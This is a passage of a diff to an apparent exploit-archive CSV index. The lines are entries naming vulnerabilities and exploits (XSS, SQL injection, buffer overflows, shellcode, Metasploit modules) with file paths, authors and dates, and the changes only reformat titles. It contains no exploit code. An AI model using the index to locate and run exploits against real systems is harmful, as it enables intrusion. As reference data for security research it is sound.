Unauthorized Administrative Access",2003-11-11,r00t@rsteam.ru,php,webapps,0 23373,platforms/windows/remote/23373.html,"Opera Web Browser 7.x - URI Handler Directory Traversal",2003-11-12,S.G.Masood,windows,remote,0 23374,platforms/windows/dos/23374.pl,"Qualcomm Eudora 5.x/6.0 Spoofed Attachment Line Denial of Service",2003-11-12,"Paul Szabo",windows,dos,0 23375,platforms/linux/dos/23375.txt,"GNU Zebra 0.9x / Quagga 0.96 - Remote Denial of Service",2003-11-12,"Jonny Robertson",linux,dos,0 @@ -20607,7 +20607,7 @@ id,file,description,date,author,platform,type,port 23377,platforms/hardware/remote/23377.txt,"FortiGate Firewall 2.x - Policy Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23378,platforms/hardware/remote/23378.txt,"FortiGate Firewall 2.x - listdel Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 23379,platforms/hardware/remote/23379.txt,"FortiGate Firewall 2.x - selector Admin Interface XSS",2003-11-12,"Maarten Hartsuijker",hardware,remote,0 -23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",multiple,remote,0 +23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",multiple,remote,0 23381,platforms/php/webapps/23381.txt,"phpWebFileManager 2.0 - index.php Directory Traversal",2003-11-17,"RusH security team",php,webapps,0 23390,platforms/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow",2003-11-20,D_BuG,multiple,dos,0 23391,platforms/linux/dos/23391.txt,"FreeRADIUS 0.x/1.1.x - Tag Field Heap Corruption",2003-11-20,"Evgeny Legerov",linux,dos,0 @@ -20621,7 +20621,7 @@ id,file,description,date,author,platform,type,port 23399,platforms/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",windows,remote,0 23400,platforms/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 MHTML Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote,0 23401,platforms/windows/remote/23401.txt,"Microsoft Outlook Express 6.0 MHTML Forced File Execution (2)",2003-11-25,"Liu Die Yu",windows,remote,0 -23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 +23402,platforms/jsp/webapps/23402.txt,"Macromedia JRun 4.0 build 61650 - Administrative Interface Multiple Cross-Site Scripting Vulnerabilities",2003-11-26,dr_insane,jsp,webapps,0 23403,platforms/php/webapps/23403.pl,"My_EGallery Module 3.1.1 - Remote File Inclusion Command Injection",2003-11-26,"Bojan Zdrnja",php,webapps,0 23405,platforms/multiple/remote/23405.c,"Applied Watch Command Center 1.0 - Authentication Bypass (2)",2003-11-28,"Bugtraq Security",multiple,remote,0 23406,platforms/php/webapps/23406.txt,"CuteNews 1.3 Debug Query Information Disclosure Weakness",2003-12-01,scrap,php,webapps,0 @@ -20671,7 +20671,7 @@ id,file,description,date,author,platform,type,port 23448,platforms/php/webapps/23448.php,"phpwcms 1.5.4.6 - 'preg_replace' Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 - index.inc.php File Include",2003-12-20,frog,php,webapps,0 23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 members/index.inc.php File Include",2003-12-20,frog,php,webapps,0 -23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 message.php File Include",2003-12-20,frog,php,webapps,0 +23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 - message.php File Include",2003-12-20,frog,php,webapps,0 23456,platforms/php/webapps/23456.txt,"BES-CMS 0.4/0.5 start.php File Include",2003-12-20,frog,php,webapps,0 23457,platforms/php/webapps/23457.txt,"BES-CMS 0.4/0.5 folder.php File Include",2003-12-20,frog,php,webapps,0 23458,platforms/php/webapps/23458.txt,"BES-CMS 0.4/0.5 hacking.php File Include",2003-12-20,frog,php,webapps,0 @@ -20707,9 +20707,9 @@ id,file,description,date,author,platform,type,port 23488,platforms/cgi/webapps/23488.txt,"BulletScript MailList bsml.pl Information Disclosure",2003-12-29,M0rf,cgi,webapps,0 23489,platforms/windows/remote/23489.txt,"Sygate Personal Firewall 5.0 DLL Authentication Bypass",2003-12-29,Aphex,windows,remote,0 23490,platforms/windows/remote/23490.txt,"Microsoft IIS 5.0 Failure To Log Undocumented TRACK Requests",2003-12-29,"Parcifal Aertssen",windows,remote,0 -23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0 -23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0 -23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 +23491,platforms/windows/remote/23491.pl,"Jordan Windows Telnet Server 1.0/1.2 - Username Stack Based Buffer Overrun (1)",2003-12-29,fiNis,windows,remote,0 +23492,platforms/windows/remote/23492.c,"Jordan Windows Telnet Server 1.0/1.2 - Username Stack Based Buffer Overrun (2)",2003-12-29,D4rkGr3y,windows,remote,0 +23493,platforms/windows/remote/23493.txt,"Jordan Windows Telnet Server 1.0/1.2 - Username Stack Based Buffer Overrun (3)",2003-12-29,"Luigi Auriemma",windows,remote,0 23494,platforms/php/webapps/23494.txt,"Clockstone and other CMSMasters Theme - File Upload",2012-12-19,DigiP,php,webapps,0 23630,platforms/php/webapps/23630.txt,"Aprox Portal 3.0 - File Disclosure",2004-01-31,"Zero X",php,webapps,0 23496,platforms/windows/dos/23496.txt,"DIMIN Viewer 5.4.0 GIF Decode Crash PoC",2012-12-19,"Lizhi Wang",windows,dos,0 @@ -20725,11 +20725,11 @@ id,file,description,date,author,platform,type,port 23504,platforms/windows/dos/23504.txt,"Microsoft Windows XP/2000 showHelp CHM File Execution Weakness",2003-12-30,"Arman Nayyeri",windows,dos,0 23505,platforms/osx/dos/23505.c,"Apple MacOS X 10.x - SecurityServer Daemon Local Denial of Service",2003-12-30,"Matt Burnett",osx,dos,0 23506,platforms/windows/dos/23506.txt,"GoodTech Telnet Server 4.0 - Remote Denial of Service",2004-01-02,"Donato Ferrante",windows,dos,0 -23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 config_page.php Remote PHP File Include",2004-01-02,tsbeginnervn,php,webapps,0 +23507,platforms/php/webapps/23507.txt,"EasyDynamicPages 1.0 - config_page.php Remote PHP File Include",2004-01-02,tsbeginnervn,php,webapps,0 23508,platforms/hardware/dos/23508.txt,"YaSoft Switch Off 2.3 Large Packet Remote Denial of Service",2004-01-02,"Peter Winter-Smith",hardware,dos,0 23509,platforms/windows/remote/23509.c,"YaSoft Switch Off 2.3 swnet.dll Remote Buffer Overflow",2004-01-02,MrNice,windows,remote,0 23510,platforms/linux/local/23510.c,"XSOK 1.0 2 LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0 -23511,platforms/windows/local/23511.txt,"Surfnet 1.31 Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0 +23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0 23512,platforms/windows/dos/23512.txt,"Surfnet 1.31 CMD_CREDITCARD_CHARGE Denial of Service",2004-01-02,Rift_XT,windows,dos,0 23513,platforms/php/webapps/23513.txt,"Athena Web Registration Remote Command Execution",2004-01-02,"Peter Kieser",php,webapps,0 23514,platforms/windows/remote/23514.pl,"Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server Buffer Overflow",2004-01-04,"Peter Winter-Smith",windows,remote,0 @@ -20740,7 +20740,7 @@ id,file,description,date,author,platform,type,port 23519,platforms/php/webapps/23519.txt,"FreznoShop 1.2.3/1.3 - Search Script Cross-Site Scripting",2004-01-04,"David S. Ferreira",php,webapps,0 23520,platforms/php/webapps/23520.txt,"PhpGedView 2.61 - Multiple PHP Remote File Inclusion",2004-01-06,Windak,php,webapps,0 23691,platforms/php/webapps/23691.txt,"VBulletin 3.0 - Search.php Cross-Site Scripting",2004-02-13,"Rafel Ivgi The-Insider",php,webapps,0 -23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 +23692,platforms/windows/dos/23692.txt,"Sami FTP Server 1.1.3 - Invalid Command Argument Local DoS",2004-02-13,"intuit e.b.",windows,dos,0 23522,platforms/multiple/remote/23522.rb,"NetWin SurgeFTP Authenticated Admin Command Injection (Metasploit)",2012-12-20,"Spencer McIntyre",multiple,remote,0 23523,platforms/linux/dos/23523.c,"gdb (GNU debugger) 7.5.1 - NULL Pointer Dereference",2012-12-20,nitr0us,linux,dos,0 23524,platforms/multiple/dos/23524.c,"IDA Pro 6.3 - Crash PoC",2012-12-20,nitr0us,multiple,dos,0 @@ -20750,7 +20750,7 @@ id,file,description,date,author,platform,type,port 23528,platforms/hardware/remote/23528.txt,"Edimax AR-6004 ADSL Router Management Interface Cross-Site Scripting",2004-01-06,"Rafel Ivgi",hardware,remote,0 23529,platforms/windows/remote/23529.txt,"SnapStream PVS Lite 2.0 - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",windows,remote,0 23530,platforms/windows/dos/23530.c,"Kroum Grigorov KpyM Telnet Server 1.0 - Remote Denial of Service",2004-01-07,NoRpiuS,windows,dos,0 -23531,platforms/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 Username Format String",2004-01-12,mandragore,windows,remote,0 +23531,platforms/windows/remote/23531.c,"HD Soft Windows FTP Server 1.5/1.6 - Username Format String",2004-01-12,mandragore,windows,remote,0 23532,platforms/windows/remote/23532.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb Directory Traversal",2004-01-09,badpack3t,windows,remote,0 23533,platforms/windows/remote/23533.txt,"Accipiter DirectServer 6.0 - Remote File Disclosure",2004-01-09,"Mark Bassett",windows,remote,0 23534,platforms/windows/dos/23534.txt,"Hand-Crafted Software FreeProxy 3.5/3.6 - FreeWeb CreateFile Function Denial of Service",2004-01-09,badpack3t,windows,dos,0 @@ -20766,7 +20766,7 @@ id,file,description,date,author,platform,type,port 23544,platforms/windows/remote/23544.txt,"vicomsoft rapidcache server 2.0/2.2.6 - Directory Traversal",2004-01-15,"Peter Winter-Smith",windows,remote,0 23545,platforms/hardware/remote/23545.txt,"Whale Communications e-Gap Security Appliance 2.5 Login Page Source Code Disclosure",2004-01-15,Procheckup,hardware,remote,0 23546,platforms/php/webapps/23546.txt,"phpShop Web Shopping Cart 0.6.1 -b - Multiple Function XSS",2004-01-16,JeiAr,php,webapps,0 -23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 Adminlogin.ASP SQL Injection",2004-01-16,posidron,asp,webapps,0 +23547,platforms/asp/webapps/23547.txt,"XtremeASP PhotoGallery 2.0 - Adminlogin.ASP SQL Injection",2004-01-16,posidron,asp,webapps,0 23548,platforms/cgi/webapps/23548.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter SQL Injection",2004-01-16,JeiAr,cgi,webapps,0 23549,platforms/cgi/webapps/23549.txt,"MetaDot Portal Server 5.6.x - index.pl Information Disclosure",2004-01-16,JeiAr,cgi,webapps,0 23550,platforms/cgi/webapps/23550.txt,"MetaDot Portal Server 5.6.x - index.pl Multiple Parameter XSS",2004-01-16,JeiAr,cgi,webapps,0 @@ -20842,7 +20842,7 @@ id,file,description,date,author,platform,type,port 23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 23623,platforms/php/webapps/23623.txt,"City Directory Review and Rating Script - (search.php) SQL Injection",2012-12-24,3spi0n,php,webapps,0 23624,platforms/php/webapps/23624.txt,"MyBB HM My Country Flags - SQL Injection",2012-12-24,JoinSe7en,php,webapps,0 -23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin (index.php id parameter) - SQL Injection",2012-12-24,Red_Hat,php,webapps,0 +23625,platforms/php/webapps/23625.txt,"MyBB AwayList Plugin - (index.php id parameter) SQL Injection",2012-12-24,Red_Hat,php,webapps,0 23686,platforms/windows/dos/23686.txt,"Monkey HTTP Daemon 0.x - Missing Host Field Denial of Service",2004-02-11,"Luigi Auriemma",windows,dos,0 23687,platforms/php/webapps/23687.txt,"Macallan Mail Solution Macallan Mail Solution 2.8.4.6 (Build 260) - Web Interface Authentication Bypass",2004-02-12,"Ziv Kamir",php,webapps,0 23688,platforms/php/webapps/23688.txt,"VBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 @@ -20882,7 +20882,7 @@ id,file,description,date,author,platform,type,port 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 Results.STM Post Request Buffer Overflow",2004-02-09,nd@felinemenace.org,windows,dos,0 23665,platforms/windows/dos/23665.c,"Shaun2k2 Palmhttpd Server 3.0 - Remote Denial of Service",2004-02-09,shaun2k2,windows,dos,0 23666,platforms/php/webapps/23666.txt,"JShop E-Commerce Suite xSearch Cross-Site Scripting",2004-02-09,"David Sopas Ferreira",php,webapps,0 -23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0 +23667,platforms/linux/dos/23667.txt,"ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service",2004-02-09,"Oliver Eikemeier",linux,dos,0 23668,platforms/windows/remote/23668.txt,"Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness",2004-02-07,Jelmer,windows,remote,0 23669,platforms/php/webapps/23669.txt,"PHP-Nuke 6.x/7.x - 'Reviews' Module Cross-Site Scripting",2004-02-09,"Janek Vind",php,webapps,0 23670,platforms/php/webapps/23670.pl,"PHP-Nuke 6.x/7.x - Public Message SQL Injection",2004-02-09,"Janek Vind",php,webapps,0 @@ -20893,8 +20893,8 @@ id,file,description,date,author,platform,type,port 23675,platforms/windows/remote/23675.txt,"Microsoft Windows XP HCP URI Handler Arbitrary Command Execution",2004-02-09,"Bartosz Kwitkowski",windows,remote,0 23676,platforms/asp/webapps/23676.txt,"MaxWebPortal 1.3x down.asp HTTP_REFERER XSS",2004-02-10,"Manuel Lopez",asp,webapps,0 23677,platforms/asp/webapps/23677.txt,"MaxWebPortal 1.3x Personal Message SendTo Parameter XSS",2004-02-10,"Manuel Lopez",asp,webapps,0 -23678,platforms/windows/remote/23678.html,"Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting (1)",2004-02-10,"Cheng Peng Su",windows,remote,0 -23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0 +23678,platforms/windows/remote/23678.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (1)",2004-02-10,"Cheng Peng Su",windows,remote,0 +23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0 23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 @@ -20934,7 +20934,7 @@ id,file,description,date,author,platform,type,port 23726,platforms/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 readings/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23727,platforms/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 resultsignore.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0 -23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 Error.ASP Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps,0 +23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 - Error.ASP Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps,0 23730,platforms/windows/remote/23730.txt,"AOL Instant Messenger 4.x/5.x - Buddy Icon Predictable File Location Weakness",2004-02-19,"Michael Evanchik",windows,remote,0 23731,platforms/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption Denial of Service",2004-02-20,"intuit bug_hunter",windows,dos,0 23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0 @@ -20953,13 +20953,13 @@ id,file,description,date,author,platform,type,port 23745,platforms/php/webapps/23745.txt,"XMB Forum 1.8 u2uadmin.php uid Parameter XSS",2004-02-23,"Janek Vind",php,webapps,0 23746,platforms/php/webapps/23746.txt,"XMB Forum 1.8 editprofile.php user Parameter XSS",2004-02-23,"Janek Vind",php,webapps,0 23747,platforms/php/webapps/23747.txt,"XMB Forum 1.8 BBcode align Tag XSS",2004-02-23,"Janek Vind",php,webapps,0 -23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 +23748,platforms/php/webapps/23748.txt,"XMB Forum 1.8 - forumdisplay.php Multiple Parameter SQL Injection",2004-02-23,"Janek Vind",php,webapps,0 23749,platforms/php/webapps/23749.txt,"LiveJournal 1.1 CSS HTML Injection",2004-02-23,"Michael Scovetta",php,webapps,0 23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Pre-authenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - phptest.php Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0 -23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free",2012-12-31,Metasploit,windows,remote,0 +23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer - CDwnBindInfo Object Use-After-Free",2012-12-31,Metasploit,windows,remote,0 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine Remote Denial of Service",2004-02-24,"Luigi Auriemma",multiple,dos,0 23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit Remote Denial of Service",2004-02-24,"Luigi Auriemma",linux,dos,0 @@ -20969,7 +20969,7 @@ id,file,description,date,author,platform,type,port 23761,platforms/windows/dos/23761.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (2)",2004-02-26,shaun2k2,windows,dos,0 23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (3)",2004-02-26,shaun2k2,windows,dos,0 23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 - MDTM Command Time Argument Buffer Overflow (4)",2004-02-26,lion,windows,remote,0 -23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting",2004-02-26,Soby,hardware,remote,0 +23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 - Error Page Cross-Site Scripting",2004-02-26,Soby,hardware,remote,0 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage",2004-02-27,iDefense,windows,remote,0 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting",2003-09-11,Jelmer,windows,remote,0 @@ -20983,15 +20983,15 @@ id,file,description,date,author,platform,type,port 23776,platforms/windows/remote/23776.txt,"Software602 602Pro LAN Suite Web Mail Cross-Site Scripting",2004-03-01,"Rafel Ivgi The-Insider",windows,remote,0 23777,platforms/linux/remote/23777.txt,"Squid Proxy 2.4/2.5 NULL URL Character Unauthorized Access",2004-03-01,"Mitch Adair",linux,remote,0 23778,platforms/hardware/dos/23778.c,"Motorola T720 Phone Denial of Service",2004-03-01,"Shaun Colley",hardware,dos,0 -23779,platforms/linux/dos/23779.txt,"Grep < 2.11 Integer Overflow Crash PoC",2012-12-31,"Joshua Rogers",linux,dos,0 -23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 Crash PoC",2012-12-31,IndonesiaGokilTeam,windows,dos,0 -23781,platforms/php/webapps/23781.txt,"MyBB (editpost.php posthash) - SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 +23779,platforms/linux/dos/23779.txt,"Grep < 2.11 - Integer Overflow Crash PoC",2012-12-31,"Joshua Rogers",linux,dos,0 +23780,platforms/windows/dos/23780.py,"Aktiv Player 2.80 - Crash PoC",2012-12-31,IndonesiaGokilTeam,windows,dos,0 +23781,platforms/php/webapps/23781.txt,"MyBB - (editpost.php posthash) SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 23782,platforms/php/webapps/23782.txt,"Joomla Spider Calendar - (index.php date param) Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 23783,platforms/windows/local/23783.rb,"BlazeDVD 6.1 - PLF Exploit DEP/ASLR Bypass (Metasploit)",2012-12-31,"Craig Freyman",windows,local,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - index.php SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 blocker_query.php Multiple Parameter XSS",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 -23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0 +23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer - CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0 23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos,0 23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0 @@ -21009,7 +21009,7 @@ id,file,description,date,author,platform,type,port 23800,platforms/osx/remote/23800.txt,"Apple Safari 1.x - Cookie Path Traversal Information Disclosure",2004-03-10,"Corsaire Limited",osx,remote,0 23801,platforms/linux/remote/23801.txt,"GNU MyProxy 20030629 - Cross-Site Scripting",2004-03-11,"Donato Ferrante",linux,remote,0 23802,platforms/linux/remote/23802.txt,"Pegasi Web Server 0.2.2 - Arbitrary File Access",2004-03-11,"Donato Ferrante",linux,remote,0 -23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 Error Page XSS",2004-03-11,"Donato Ferrante",linux,remote,0 +23803,platforms/linux/remote/23803.txt,"Pegasi Web Server 0.2.2 - Error Page XSS",2004-03-11,"Donato Ferrante",linux,remote,0 23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0 23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos,0 23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0 @@ -21060,7 +21060,7 @@ id,file,description,date,author,platform,type,port 23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 register.asp err Parameter XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0 23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,Metasploit,php,remote,0 -23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 comment_add.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 +23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - comment_add.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - search.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23859,platforms/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 category_news_headline.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23860,platforms/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 more.asp ID Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -21071,7 +21071,7 @@ id,file,description,date,author,platform,type,port 23865,platforms/php/webapps/23865.txt,"VBulletin 2.x - Private.php Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injection",2004-03-23,JeiAr,php,webapps,0 -23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 Comments function id Parameter SQL Injection",2004-03-22,JeiAr,php,webapps,0 +23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - Comments function id Parameter SQL Injection",2004-03-22,JeiAr,php,webapps,0 23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0 23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0 @@ -21092,7 +21092,7 @@ id,file,description,date,author,platform,type,port 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow",2013-01-08,Metasploit,windows,remote,0 23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x - HTML Injection",2004-03-29,"koi8-r Shelz",cgi,webapps,0 -23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0 +23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 - category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0 23892,platforms/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,linux,local,0 23893,platforms/multiple/remote/23893.txt,"WebCT Campus Edition 3.8/4.x - HTML Injection",2004-03-29,"Simon Boulet",multiple,remote,0 23894,platforms/cgi/webapps/23894.txt,"Cloisterblog 1.2.2 Journal.pl Directory Traversal",2004-03-29,Dotho,cgi,webapps,0 @@ -21103,19 +21103,19 @@ id,file,description,date,author,platform,type,port 23899,platforms/asp/webapps/23899.txt,"CactuSoft CactuShop 5.0/5.1 - Cross-Site Scripting",2004-03-31,"Nick Gudov",asp,webapps,0 23900,platforms/hardware/dos/23900.txt,"CDP 0.33/0.4 Console CD Player PrintTOC Function Buffer Overflow",2004-03-31,"Shaun Colley",hardware,dos,0 23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - XSS / CSRF / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 -23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 HTML Form Status Bar Misrepresentation",2004-03-31,http-equiv,windows,remote,0 -23904,platforms/multiple/dos/23904.txt,"Roger Wilco Server 1.4.1 Unauthorized Audio Stream Denial of Service",2004-03-31,"Luigi Auriemma",multiple,dos,0 +23903,platforms/windows/remote/23903.html,"Microsoft Internet Explorer 6.0 - HTML Form Status Bar 